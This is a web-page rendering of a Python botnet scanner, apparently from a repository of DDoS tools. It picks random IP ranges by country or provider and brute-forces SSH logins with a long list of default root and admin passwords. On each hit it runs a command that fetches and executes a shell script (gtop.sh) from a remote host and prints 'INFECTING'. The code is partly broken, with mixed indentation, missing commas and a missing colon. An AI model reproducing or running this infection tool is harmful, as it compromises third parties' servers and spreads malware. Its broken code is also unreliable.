Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Scanning/AUTOSCANNER/XanaxScan.py
5038 views
1
#!/usr/bin/env python

2


3
import threading, paramiko, random, socket, time, sys

4


5
cmd='cd /tmp; rm -rf *; wget -q http://host/gtop.sh; chmod +x gtop.sh; sh gtop.sh; rm -rf *\r\n'

6
blacklist = [

7
    '127'

8
]

9
passwords = [ 

10
    "root:root",

11
    "root:lol",

12
    "root:admin",

13
    "ubnt:ubnt"

14
    "root:1234",

15
    "admin:1234",

16
    "root:toor",

17
    "root:sex",

18
    "root:test",

19
    "pi:pi",

20
    "root:cent6"

21
    "root:admin",

22
    "root:root",

23
    "admin:password",

24
    "ubnt:ubnt"

25
    "root:1234",

26
    "root:123",

27
	"root:12345",

28
    "root:Password",

29
    "root:lol",

30
    "root:toor",

31
    "root:centos7",

32
    "root:qwerty",

33
    "root:centos6",

34
    "root:pussy",

35
    "root:user",

36
    "root:money",

37
    "root:love",

38
    "root:1",

39
	"root:2",

40
	"root:3",

41
	"root:0",

42
	"root:987",

43
	"root:5",

44
	"root:beer",

45
	"root:cia",

46
	"root:fbi",

47
	"root:hack",

48
	"root:bank",

49
	"root:gov",

50
	"root:youtube",

51
	"root:website",

52
	"root:server",

53
	"root:weed",

54
	"root:420",

55
	"root:computer",

56
	"root:linux",

57
	"root:debain",

58
	"root:cent",

59
	"root:vps",

60
	"root:VPS",

61
	"root:light",

62
	"root:cap",

63
	"root:hat",

64
	"root:butt",

65
	"root:but",

66
	"root:name",

67
	"root:god",

68
	"root:work",

69
	"root:job",

70
	"root:bailey",

71
	"root:123456",

72
	"root:michael",

73
	"root:superman",

74
	"root:batman",

75
	"root:starwars",

76
	"root:startrek",

77
	"root:desktop",

78
	"root:windows",

79
	"root:netflix",

80
	"root:shoe",

81
	"root:foot",

82
	"root:tor",

83
	"root:rot",

84
	"root:roots",

85
	"root:root1",

86
	"root:root2",

87
	"root:root3",

88
	"root:root4",

89
	"root:root5",

90
	"root:root6",

91
	"root:root12",

92
	"root:root123",

93
	"root:root1234",

94
	"root:root12345",

95
	"root:root123456",

96
	"root:iphone",

97
	"root:apple",

98
	"root:verizon",

99
	"root:talktalk",

100
	"root:at&t",

101
	"root:strighttalk",

102
	"root:|",

103
	"root:="

104
	"root:abc",

105
	"root:xyz",

106
	"root:abc1",

107
	"root:abc12",

108
	"root:abc123",

109
	"root:abc1234",

110
	"root:abc12345",

111
	"root:abc123456",

112
	"root:sync"

113
	"root:-"

114
	"root:",

115
	"root: ",

116
	"root:a",

117
	"root:z",

118
	"root:python",

119
	"root:perl",

120
	"root:dos",

121
	"root:sql",

122
	"root:database",

123
	"root:minecraft",

124
	"root:minecraft1",

125
	"root:minecraft2",

126
	"root:minecraft3",

127
	"root:minecraft4",

128
	"root:minecraft5",

129
	"root:minecraft6",

130
	"root:minecraft7",

131
	"root:minecraft8",

132
	"root:minecraft9",

133
	"root:minecraft0",

134
	"root:minecraft12",

135
	"root:minecraft123",

136
	"root:minecraft1234",

137
	"root:minecraft12345",

138
	"root:minecraft123456",

139
	"root:minecraft1234567"

140
	"root:minecraft12345678",

141
	"root:minecraft123456789",

142
	"root:minecraft1234567890",

143
	"root:login",

144
	"root:login123",

145
	"root:solo",

146
	"root:passw0rd",

147
	"root:password123",

148
	"root:admins",

149
	"root:cigs",

150
	"root:ruby",

151
	"root:html",

152
	"root:php",

153
	"root:youtuber",

154
	"root:pewdiepiefan",

155
	"root:pewdiepie",

156
	"root:cod",

157
	"root:android",

158
	"root:phone",

159
	"root:pass",

160
	"root:school",

161
	"root:q",

162
	"root:webserver",

163
	"root:college",

164
	"root:keys",

165
	"root:dog",

166
	"root:cat",

167
	"admin:admin",

168
	"admin:admin1",

169
	"admin:admin2",

170
	"admin:admin3",

171
	"admin:admin4",

172
	"admin:admin5",

173
	"admin:admin6",

174
	"admin:admin7",

175
	"admin:admin8",

176
	"admin:admin9",

177
	"admin:admin0",

178
	"admin:admin12",

179
	"admin:admin123",

180
	"admin:admin1234",

181
	"admin:admin12345",

182
	"admin:admin123456"

183
	"admin:admin1234567",

184
	"admin:admin12345678",

185
	"admin:admin123456789",

186
	"admin:admin1234567890",

187
	"admin:admin098",

188
	"admin:admin987",

189
	"admin:admin321",

190
]

191
if sys.argv[4] == '1':

192
    passwords = ["root:root",

193
    "root:admin",

194
    "root:root",

195
    "admin:password",

196
    "ubnt:ubnt"

197
    "root:1234",

198
    "root:123",

199
	"root:12345",

200
    "root:Password",

201
    "root:lol",

202
    "root:toor",

203
    "root:centos7",

204
    "root:qwerty",

205
    "root:centos6",

206
    "root:pussy",

207
    "root:user",

208
    "root:money",

209
    "root:love",

210
    "root:1",

211
	"root:2",

212
	"root:3",

213
	"root:0",

214
	"root:987",

215
	"root:5",

216
	"root:beer",

217
	"root:cia",

218
	"root:fbi",

219
	"root:hack",

220
	"root:bank",

221
	"root:gov",

222
	"root:youtube",

223
	"root:website",

224
	"root:server",

225
	"root:weed",

226
	"root:420",

227
	"root:computer",

228
	"root:linux",

229
	"root:debain",

230
	"root:cent",

231
	"root:vps",

232
	"root:VPS",

233
	"root:light",

234
	"root:cap",

235
	"root:hat",

236
	"root:butt",

237
	"root:but",

238
	"root:name",

239
	"root:god",

240
	"root:work",

241
	"root:job",

242
	"root:bailey",

243
	"root:123456",

244
	"root:michael",

245
	"root:superman",

246
	"root:batman",

247
	"root:starwars",

248
	"root:startrek",

249
	"root:desktop",

250
	"root:windows",

251
	"root:netflix",

252
	"root:shoe",

253
	"root:foot",

254
	"root:tor",

255
	"root:rot",

256
	"root:roots",

257
	"root:root1",

258
	"root:root2",

259
	"root:root3",

260
	"root:root4",

261
	"root:root5",

262
	"root:root6",

263
	"root:root12",

264
	"root:root123",

265
	"root:root1234",

266
	"root:root12345",

267
	"root:root123456",

268
	"root:iphone",

269
	"root:apple",

270
	"root:verizon",

271
	"root:talktalk",

272
	"root:at&t",

273
	"root:strighttalk",

274
	"root:|",

275
	"root:="

276
	"root:abc",

277
	"root:xyz",

278
	"root:abc1",

279
	"root:abc12",

280
	"root:abc123",

281
	"root:abc1234",

282
	"root:abc12345",

283
	"root:abc123456",

284
	"root:sync"

285
	"root:-"

286
	"root:",

287
	"root: ",

288
	"root:a",

289
	"root:z",

290
	"root:python",

291
	"root:perl",

292
	"root:dos",

293
	"root:sql",

294
	"root:database",

295
	"root:minecraft",

296
	"root:minecraft1",

297
	"root:minecraft2",

298
	"root:minecraft3",

299
	"root:minecraft4",

300
	"root:minecraft5",

301
	"root:minecraft6",

302
	"root:minecraft7",

303
	"root:minecraft8",

304
	"root:minecraft9",

305
	"root:minecraft0",

306
	"root:minecraft12",

307
	"root:minecraft123",

308
	"root:minecraft1234",

309
	"root:minecraft12345",

310
	"root:minecraft123456",

311
	"root:minecraft1234567"

312
	"root:minecraft12345678",

313
	"root:minecraft123456789",

314
	"root:minecraft1234567890",

315
	"root:login",

316
	"root:login123",

317
	"root:solo",

318
	"root:passw0rd",

319
	"root:password123",

320
	"root:admins",

321
	"root:cigs",

322
	"root:ruby",

323
	"root:html",

324
	"root:php",

325
	"root:youtuber",

326
	"root:pewdiepiefan",

327
	"root:pewdiepie",

328
	"root:cod",

329
	"root:android",

330
	"root:phone",

331
	"root:pass",

332
	"root:school",

333
	"root:q",

334
	"root:webserver",

335
	"root:college"

336
	"root:keys",

337
	"root:dog",

338
	"root:cat",

339
	"admin:admin",

340
	"admin:admin1",

341
	"admin:admin2",

342
	"admin:admin3",

343
	"admin:admin4",

344
	"admin:admin5",

345
	"admin:admin6",

346
	"admin:admin7",

347
	"admin:admin8",

348
	"admin:admin9",

349
	"admin:admin0",

350
	"admin:admin12",

351
	"admin:admin123",

352
	"admin:admin1234",

353
	"admin:admin12345",

354
	"admin:admin123456"

355
	"admin:admin1234567",

356
	"admin:admin12345678",

357
	"admin:admin123456789",

358
	"admin:admin1234567890",

359
	"admin:admin098",

360
	"admin:admin987",

361
	"admin:admin321",

362
    "root:123",]

363
	ipclassinfo = sys.argv[2]

364
if ipclassinfo == "A":

365
    ip1 = sys.argv[3]

366
elif ipclassinfo == "B":

367
    ip1 = sys.argv[3].split(".")[0]

368
    ip2 = sys.argv[3].split(".")[1]

369
elif ipclassinfo == "C":

370
    ips = sys.argv[3].split(".")

371
    num=0

372
    for ip in ips:

373
        num=num+1

374
        if num == 1:

375
            ip1 = ip

376
        elif num == 2:

377
            ip2 = ip

378
        elif num == 3:

379
            ip3 = ip

380
class sshscanner(threading.Thread):

381
    global passwords

382
    global ipclassinfo

383
    if ipclassinfo == "A":

384
        global ip1

385
    elif ipclassinfo == "B":

386
        global ip1

387
        global ip2

388
    elif ipclassinfo == "C":

389
        global ip1

390
        global ip2

391
        global ip3

392
    def run(self):

393
        while 1:

394
            try:

395
                while 1:

396
                    thisipisbad='no'

397
                    if ipclassinfo == "A":

398
                        self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

399
                    elif ipclassinfo == "B":

400
                        self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

401
                    elif ipclassinfo == "C":

402
                        self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))

403
                    elif ipclassinfo == "USA":

404
                        usa = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]

405
                        self.host = random.choice(usa)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

406
                    elif ipclassinfo == "Russia":

407
                        russia = ["122","131","161","37","186","187","31","188","201","2","200"]

408
                        self.host = random.choice(russia)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

409
                    elif ipclassinfo == "LSD":

410
                        lsd = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]

411
                        self.host = random.choice(lsd)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

412
                    elif ipclassinfo == "Shrooms":

413
                        shrooms = ["122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ]

414
                        self.host = random.choice(shrooms)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

415
					elif ipclassinfo == "Xanax":

416
						xanax = ["23.96","23.97","23.98","23.99","23.100","23.101","23.102","23.103","70.37","104.40","104.41","104.42","104.43","104.44","104.45","104.46","104.47","104.146","104.147","104.208","104.209","104.210","104.210","104.211","104.212","104.213","104.214","104.215","138.91","168.61","168.62","168.63","113.53","125.125","125.126","125.127"]

417
						self.host = random.choice(xanax)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

418
                    elif ipclassinfo == "Cisco":

419
                        cisco = ["1"]

420
                        self.host = random.choice(cisco)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

421
					elif ipclassinfo == "Busybox":

422
						busybox = ["199.180","142.0","158.69"]

423
						self.host = random.choice(busybox)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

424
					elif ipclassinfo == "WholeSale":

425
						wholesale = ["208.67"]

426
						self.host = random.choice(wholesale)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

427
					elif ipclassinfo == "ECATEL":

428
						ecatel = ["89.248"]

429
						self.host = random.choice(ecatel)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

430
					elif ipclassinfo == "CHINA":

431
						china = ["65.19","220.248"]

432
						self.host = random.choice(china)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

433
					elif ipclassinfo == "INDIA":

434
						india = ["1.6","1.7","1.22","1.23"]

435
						self.host = random.choice(india)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

436
					elif ipclassinfo == "CDN":

437
						cdn = ["217.106","217.106"]

438
						self.host = random.choice(cdn)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

439
					elif ipclassinfo == "AWS"

440
						aws = ["23.20","27.0","27.22","43.250","46.0","47.0","50.15","51.0","52.0","52.100"]

441
						self.host = random.choice(aws)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))                    

442
						elif ipclassinfo == "Random":

443
                        self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

444
                    else:

445
                        self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))

446
                    for badip in blacklist:

447
                        if badip in self.host:

448
                            thisipisbad='yes'

449
                    if thisipisbad=='no':

450
                        break

451
                username='root'

452
                password=""

453
                port = 22

454
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

455
                s.settimeout(3)

456
                s.connect((self.host, port))

457
                s.close()

458
                ssh = paramiko.SSHClient()

459
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

460
                dobreak=False

461
                for passwd in passwords:

462
                    if ":n/a" in passwd:

463
                        password=""

464
                    else:

465
                        password=passwd.split(":")[1]

466
                    if "n/a:" in passwd:

467
                        username=""

468
                    else:

469
                        username=passwd.split(":")[0]

470
                    try:

471
                        ssh.connect(self.host, port = port, username=username, password=password, timeout=3)

472
                        dobreak=True

473
                        break

474
                    except:

475
                        pass

476
                    if True == dobreak:

477
                        break

478
                badserver=True

479
                stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")

480
                output = stdout.read()

481
                if "inet addr" in output:

482
                    badserver=False

483
                if badserver == False:

484
                        print '\x1b[31mINFECTING:'+self.host+'|'+username+'|'+password+'|'+str(port)

485
                        ssh.exec_command(""+cmd+"")

486
                        time.sleep(20)

487
                        ssh.close()

488
            except:

489
                pass

490


491
for x in range(0,int(sys.argv[1])):

492
    try:

493
        t = sshscanner()

494
        t.start()

495
    except:

496
        pass

497